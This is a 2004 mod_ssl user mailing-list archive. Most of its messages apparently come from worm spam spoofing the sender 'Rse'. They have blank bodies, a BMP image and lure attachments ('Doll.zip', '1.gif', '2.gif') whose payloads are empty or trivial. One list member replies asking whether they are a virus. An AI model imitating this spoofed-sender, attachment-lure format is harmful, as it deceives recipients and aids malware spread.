X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id D245EA8D0C; Thu, 26 Aug 2004 09:13:46 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from c-blougouras.org (ATuileries-117-1-25-179.w193-251.abo.wanadoo.fr [193.251.48.179])
	by master.modssl.org (Postfix) with SMTP id 38707A8961
	for ; Thu, 26 Aug 2004 09:13:40 +0200 (CEST)
Date: Thu, 26 Aug 2004 09:10:56 +0100
To: "Modssl-users" 
From: "Rse" 
Subject: Re:
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------mtubxtsanrbmddvoeyte"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------mtubxtsanrbmddvoeyte
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit


  



----------mtubxtsanrbmddvoeyte
Content-Type: image/bmp; name="ryeeijirxn.bmp"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="ryeeijirxn.bmp"
Content-ID: 

Qk02DwAAAAAAADYAAAAoAAAAdwAAABAAAAABABAAAAAAAAAPAAAAAAAAAAAAAAAAAAAAAAAA
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//fwAA/3//f/9//3//f/9//39AZUBlQGVAZUBlQGVAZUBl
QGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBl
QGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBl
QGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBl
QGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBl/3//f/9//3//f/9//3//fwAA/3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//fwAA/3//f/9//3//f/9//3//f0BlQGX/f/9//3//f/9//3//f3p7
CW4JbjZ3QGVAZf9/3n/zdkBlQGWPct1/3n/zdkBlQGWPct1//3//fwluQGVXe/9/eHtAZQlu
/3//f/9//382dwluCW42d/9//3//f0BlQGX/f/9//3//f9F2CW56e0BlQGX/f/9/QGVAZf9/
/3//f/9//3/df9F2QGUJbjZ3/3//f/9/FHdAZUBlFHf/f/9//38Ud0BlQGUUd/9//3//f/9/
/39AZUBl/3//f91/0XZAZQluNnf/f/9//3//f/9//3//f/9//3//fwAA/3//f/9//3//f/9/
/3//f0BlQGX/f/9//3//f/9//3//fwluQGXdf3h7QGVAZf9/j3JAZd1/3n9AZU1yj3JAZd1/
3n9AZU1y/3/df0BlQGXRdv9/83ZAZUBl3X//f/9/V3tAZXh7eHtAZVd7/3//f0BlQGX/f/9/
/38Ud0BleHtXe0BlQGX/f/9/QGVAZf9//3//f/9//3/RdkBl3X94e0BlNnf/fxR3QGV4e5t7
QGUUd/9/FHdAZXh7m3tAZRR3/3//f/9//39AZUBl/3//f49yQGXdf3h7QGUUd/9//3//f/9/
/3//f/9//3//fwAA/3//f/9//3//f/9//3//f0BlQGX/f/9//3//f/9//3//f0BlQGX/f/9/
QGVAZf9//3//f5t7FHdAZQlu/3//f5t7FHdAZQlu/382d0BlQGVAZf9/QGVAZUBlNnf/f/9/
TXJAZf9//39AZU1y/3//f0BlQGX/f/9//38JbkBl/3//f0BlQGX/f/9//3//f/9//3//f/9/
/3//f/9//3//f0BlCW7/f0BlQGX/f/9/QGVAZf9/QGVAZf9//39AZUBl/3//f/9//39AZUBl
/3//f/9//3//f/9/QGUJbv9//3//f/9//3//f/9//3//fwAA/3//f/9//3//f/9//3//f0Bl
QGX/f/9//3//f/9//3//f3p7QGXzdt1/QGVAZf9/ensJbkBlQGUJbnp7ensJbkBlQGUJbnp7
/39NckBlentAZVd7QGWbe0BlTXL/f/9/QGVAZf9//39AZUBl/3//f0BlQGX/f/9//39AZUBl
/3//f0BlQGX/f/9//3//f/9//3//f/9//3//f/9//3//f0BlQGX/fwluQGX/f/9/QGVAZf9/
CW5AZf9//39AZUBl/3//f/9//39AZUBl/3//f/9//3//f/9/QGVAZf9//3//f/9//3//f/9/
/3//fwAA/3//f/9//3//f/9//3//f0BlQGVAZUBlQGUUd/9//3//f/9/vH82d49yQGVAZf9/
CW5AZY9yenv/f/9/CW5AZY9yenv/f/9/3X9AZY9y/39AZUBlCW7/f49yQGXdf/9/TXJAZf9/
/39AZU1y/3//f0BlQGX/f/9//38JbkBl/3//f0BlQGX/f/9//3//f/9//3//f/9//3//f/9/
/394e0Bl83b/fzZ3QGWbe3p7QGU2d/9/NndAZZt7entAZTZ3/3//f/9//39AZUBl/3//f/9/
/3//f/9/QGUJbv9//3//f/9//3//f/9//3//fwAA/3//f/9//3//f/9//3//f0BlQGX/f/9/
V3tAZRR3/3//f49ym3v/f91/QGUJbv9/TXJAZf9/3X9AZY9yTXJAZf9/3X9AZY9yNndAZXh7
/3/RdkBl83b/f3h7QGU2d/9/V3tAZXh7eHtAZVd7/3//f0BlQGWbe/9//38Ud0BleHsUd0Bl
QGX/f/9/QGVAZf9//3//f/9//3//f/9/TXJAZU1y/3//f/9/TXJAZUBlQGXef/9//39NckBl
QGVAZd5//3//f/9//39AZUBl/3//f9F2QGXdf3h7QGUUd/9//3//f/9//3//f/9//3//fwAA
/3//f/9//3//f/9//3//f0BlQGX/f/9//39AZUBl/3//f91/0XZAZUBlTXKbe/9/3X+PckBl
QGXRdt1/3X+PckBlQGXRdt1/TXJAZd5//39Xe0Blenv/f/9/QGVNcv9//382dwluQGU2d/9/
/3//f0BlQGXRdo9y/3//f9F2TXJ6e0BlQGX/f/9/QGVAZf9//3//f/9//3//f/9//39Xe0Bl
83b/f/N2QGW8f7x/QGUUd/9/83ZAZbx/vH9AZRR3/3//f9F2/39AZUBl/3//f9F2QGUJbkBl
0Xb/f/9//3//f/9//3//f/9//3//fwAA/3//f/9//3//f/9//3//f0BlQGX/f/9//39AZUBl
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f0BlQGX/f/9/
/3//f/9//3//f/9//3//f/9//3//f0BlQGX/f0BlQGX/f/9/QGVAZf9/QGVAZf9//39AZUBl
/3//f0Blj3JAZUBl/3//f1d7QGV6e/9//3//f/9//3//f/9//3//f/9//3//fwAA/3//f/9/
/3//f/9//3//f0BlQGX/f/9/eHtAZfN2/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f0BlQGX/f/9//3//f/9//3//f/9//3/zdkBl3X+8f0Bl0Xb/f9F2
QGW8f7x/QGXRdv9/0XZAZbx/vH9AZdF2/3//f91/0XZAZUBl/3//f5t7QGXzdv9//3//f/9/
/3//f/9//3//f/9//3//fwAA/3//f/9//3//f/9//3//f0BlQGVAZUBlQGXzdv9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f0BlQGX/f/9//3//f/9/
/3//f/9//3/df/N2QGVAZfN2/3//f91/83ZAZUBl83bef/9/3X/zdkBlQGXzdt5//3//f/9/
/3/zdkBl/3//f95/QGVAZUBlQGVAZf9//3//f/9//3//f/9//3//fwAA/3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//fwAA/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//fwAA/3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//fwAA

----------mtubxtsanrbmddvoeyte
Content-Type: application/octet-stream; name="Doll.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="Doll.zip"



----------mtubxtsanrbmddvoeyte--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Aug 27 16:39:16 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id B7E93A8CCE; Fri, 27 Aug 2004 16:39:16 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from S0027298858-BITFALL02.com (c-67-163-91-163.client.comcast.net [67.163.91.163])
	by master.modssl.org (Postfix) with SMTP id 9A465A895E
	for ; Fri, 27 Aug 2004 16:39:15 +0200 (CEST)
Date: Fri, 27 Aug 2004 09:37:17 -0600
To: "Modssl-users" 
From: "Rse" 
Subject: 1
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------rmcjgmriexfmlqnhdzqn"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------rmcjgmriexfmlqnhdzqn
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit










----------rmcjgmriexfmlqnhdzqn
Content-Type: application/octet-stream; name="1.gif"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="1.gif"

NDU0NTEyMTI=

----------rmcjgmriexfmlqnhdzqn--


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Aug 27 16:41:23 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id A2433A8D11; Fri, 27 Aug 2004 16:41:23 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from kia.net (adsl-64-123-173-62.dsl.rcsntx.swbell.net [64.123.173.62])
	by master.modssl.org (Postfix) with SMTP id C1531A8CCD
	for ; Fri, 27 Aug 2004 16:41:18 +0200 (CEST)
Date: Fri, 27 Aug 2004 09:46:07 -0600
To: "Modssl-users" 
From: "Rse" 
Subject: 1
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------aptgjgjbemtloxqbggnu"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------aptgjgjbemtloxqbggnu
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit










----------aptgjgjbemtloxqbggnu
Content-Type: application/octet-stream; name="2.gif"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="2.gif"

NDU0NTEyMTI=

----------aptgjgjbemtloxqbggnu--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Aug 27 16:44:44 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 297F0A8CCE; Fri, 27 Aug 2004 16:44:44 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from office.org (c-67-169-211-231.client.comcast.net [67.169.211.231])
	by master.modssl.org (Postfix) with SMTP id 429F7A895E
	for ; Fri, 27 Aug 2004 16:44:38 +0200 (CEST)
Date: Fri, 27 Aug 2004 07:44:31 -0800
To: "Modssl-users" 
From: "Rse" 
Subject: 1
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------ixgjwypbpcyllrqgqoru"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------ixgjwypbpcyllrqgqoru
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit










----------ixgjwypbpcyllrqgqoru
Content-Type: application/octet-stream; name="1.gif"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="1.gif"

NDU0NTEyMTI=

----------ixgjwypbpcyllrqgqoru--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Aug 27 16:56:15 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 3A81EA8CD1; Fri, 27 Aug 2004 16:56:15 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from Jawad.net (adsl-68-77-2-49.dsl.emhril.ameritech.net [68.77.2.49])
	by master.modssl.org (Postfix) with SMTP id 453F2A8CCD
	for ; Fri, 27 Aug 2004 16:56:09 +0200 (CEST)
Date: Fri, 27 Aug 2004 09:55:57 -0600
To: "Modssl-users" 
From: "Rse" 
Subject: 1
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------eohuhdxqpksrciblmjyy"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------eohuhdxqpksrciblmjyy
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit










----------eohuhdxqpksrciblmjyy
Content-Type: application/octet-stream; name="2.gif"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="2.gif"

NDU0NTEyMTI=

----------eohuhdxqpksrciblmjyy--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Aug 27 17:25:56 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 6A5D7A8A49; Fri, 27 Aug 2004 17:25:56 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from Hughes.net (pp0007e9756a1d.usask.ca [128.233.16.140])
	by master.modssl.org (Postfix) with SMTP id 46151A8938
	for ; Fri, 27 Aug 2004 17:25:50 +0200 (CEST)
Date: Fri, 27 Aug 2004 09:23:38 -0600
To: "Modssl-users" 
From: "Rse" 
Subject: 1
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------vwvcpsbokhrdvfnieblf"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------vwvcpsbokhrdvfnieblf
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit










----------vwvcpsbokhrdvfnieblf
Content-Type: application/octet-stream; name="2.gif"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="2.gif"

NDU0NTEyMTI=

----------vwvcpsbokhrdvfnieblf--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Aug 27 17:29:44 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 9198BA8A53; Fri, 27 Aug 2004 17:29:44 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from toshiba-user.org (c-67-180-74-40.client.comcast.net [67.180.74.40])
	by master.modssl.org (Postfix) with SMTP id 8EA58A8982
	for ; Fri, 27 Aug 2004 17:29:36 +0200 (CEST)
Date: Fri, 27 Aug 2004 08:29:26 -0800
To: "Modssl-users" 
From: "Rse" 
Subject: 2
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------satjfvijybcpdbzbzgue"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------satjfvijybcpdbzbzgue
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit










----------satjfvijybcpdbzbzgue
Content-Type: application/octet-stream; name="2.gif"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="2.gif"

NDU0NTEyMTI=

----------satjfvijybcpdbzbzgue--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Aug 27 17:34:52 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id CC69BA8A49; Fri, 27 Aug 2004 17:34:52 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from pred-jacks091L.net (pool-141-156-254-41.res.east.verizon.net [141.156.254.41])
	by master.modssl.org (Postfix) with SMTP id 9A27FA8938
	for ; Fri, 27 Aug 2004 17:34:47 +0200 (CEST)
Date: Fri, 27 Aug 2004 11:34:38 -0500
To: "Modssl-users" 
From: "Rse" 
Subject: 1
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------xzlfhghyqvwswyxazwec"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------xzlfhghyqvwswyxazwec
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit










----------xzlfhghyqvwswyxazwec
Content-Type: application/octet-stream; name="2.gif"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="2.gif"

NDU0NTEyMTI=

----------xzlfhghyqvwswyxazwec--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Aug 27 17:37:34 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 143F0A8A49; Fri, 27 Aug 2004 17:37:34 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from JACKSON-CO.com (pm103-03.dialip.mich.net [198.109.192.46])
	by master.modssl.org (Postfix) with SMTP id E5757A8938
	for ; Fri, 27 Aug 2004 17:37:28 +0200 (CEST)
Date: Fri, 27 Aug 2004 11:37:08 -0500
To: "Modssl-users" 
From: "Rse" 
Subject: 2
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------iboxnrfxxrvgeaovaxal"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------iboxnrfxxrvgeaovaxal
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit










----------iboxnrfxxrvgeaovaxal
Content-Type: application/octet-stream; name="2.gif"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="2.gif"

NDU0NTEyMTI=

----------iboxnrfxxrvgeaovaxal--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Aug 27 17:46:34 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id E2F4EA8A49; Fri, 27 Aug 2004 17:46:33 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from your-sz6x6sefxo.org (h-67-101-62-63.mclnva23.dynamic.covad.net [67.101.62.63])
	by master.modssl.org (Postfix) with SMTP id 821B5A8938
	for ; Fri, 27 Aug 2004 17:46:28 +0200 (CEST)
Date: Fri, 27 Aug 2004 08:46:21 -0800
To: "Modssl-users" 
From: "Rse" 
Subject: 1
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------eghehcmwcnwfwrjhpsnq"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------eghehcmwcnwfwrjhpsnq
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit










----------eghehcmwcnwfwrjhpsnq
Content-Type: application/octet-stream; name="2.gif"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="2.gif"

NDU0NTEyMTI=

----------eghehcmwcnwfwrjhpsnq--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Aug 27 18:00:24 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 37C7DA8A49; Fri, 27 Aug 2004 18:00:24 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from primejw.org (adsl-67-127-56-37.dsl.pltn13.pacbell.net [67.127.56.37])
	by master.modssl.org (Postfix) with SMTP id 49403A8938
	for ; Fri, 27 Aug 2004 18:00:18 +0200 (CEST)
Date: Fri, 27 Aug 2004 09:00:11 -0800
To: "Modssl-users" 
From: "Rse" 
Subject: 1
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------jzktdvqcmhocmzhvcelg"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------jzktdvqcmhocmzhvcelg
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit










----------jzktdvqcmhocmzhvcelg
Content-Type: application/octet-stream; name="1.gif"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="1.gif"

NDU0NTEyMTI=

----------jzktdvqcmhocmzhvcelg--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Aug 27 18:02:52 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id D8FDAA8A49; Fri, 27 Aug 2004 18:02:51 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from sgtulmg01.sabre.com (sgtulmg01.sabre.com [151.193.220.17])
	by master.modssl.org (Postfix) with ESMTP id CD65CA8938
	for ; Fri, 27 Aug 2004 18:02:42 +0200 (CEST)
Received: from unknown (HELO SGNSOLO19151501.com) (10.16.131.25)
  by sgtulmg01.sabre.com with SMTP; 27 Aug 2004 10:56:31 -0500
X-Ironport-AV: i="3.84,116,1091422800"; 
   d="scan'217,208?gif'217,208"; a="219635635:sNHT279802964"
Date: Fri, 27 Aug 2004 10:57:36 -0600
To: "Modssl-users" 
From: "Rse" 
Subject: 1
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------eoxkvqogjlpnqfooepkr"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------eoxkvqogjlpnqfooepkr
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit










----------eoxkvqogjlpnqfooepkr
Content-Type: application/octet-stream; name="1.gif"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="1.gif"

NDU0NTEyMTI=

----------eoxkvqogjlpnqfooepkr--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Aug 27 18:25:47 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 6B3F1A8CCE; Fri, 27 Aug 2004 18:25:47 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from dns1.arhosting.com (dns1.arhosting.com [216.63.180.37])
	by master.modssl.org (Postfix) with SMTP id 70072A895E
	for ; Fri, 27 Aug 2004 18:25:41 +0200 (CEST)
Received: (qmail 17818 invoked by uid 113); 27 Aug 2004 16:25:33 -0000
Received: from barry@arhosting.com by dns1.arhosting.com by uid 110 with qmail-scanner-1.16 
 (uvscan: v4.2.40/v4100. spamassassin: 2.50.  Clear:SA:0(-16.3/5.0):. 
 Processed in 2.33982 secs); 27 Aug 2004 16:25:33 -0000
Received: from unknown (HELO arhosting.com) (barry@170.94.21.32)
  by dns1.arhosting.com with SMTP; 27 Aug 2004 16:25:30 -0000
Message-ID: <412F5250.3010702@arhosting.com>
Date: Fri, 27 Aug 2004 11:25:04 -0400
From: Barry Smoke 
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040413 Debian/1.6-5
X-Accept-Language: en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: 1
References: 
In-Reply-To: 
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
X-Spam-Status: No, hits=-16.3 required=5.0
	tests=IN_REP_TO,QUOTE_TWICE_1,REFERENCES,USER_AGENT_MOZILLA_UA
	version=2.50
X-Spam-Level: 
X-Spam-Checker-Version: SpamAssassin 2.50 (1.173-2003-02-20-exp)
X-Pyzor: Reported 0 times.
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Barry Smoke 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

these e-mails look strange,
virus?

Rse wrote:

>
>
>

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Aug 28 02:55:09 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 7C3C9A8CCE; Sat, 28 Aug 2004 02:55:09 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
